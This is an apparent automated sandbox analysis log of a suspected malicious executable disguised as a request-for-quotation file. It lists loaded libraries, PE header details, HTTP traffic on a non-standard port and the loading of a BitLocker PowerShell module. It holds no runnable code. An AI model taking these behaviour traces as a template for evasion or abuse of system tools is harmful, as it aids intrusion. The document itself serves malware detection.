                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic file information: File size 2875465 > 1048576
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb@H`h source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbH source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbW source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: 0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F0752B push ebx; iretd 0_2_00007FF848F0756A
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848FD0000 push esp; retf 4810h0_2_00007FF848FD0312

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49717
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
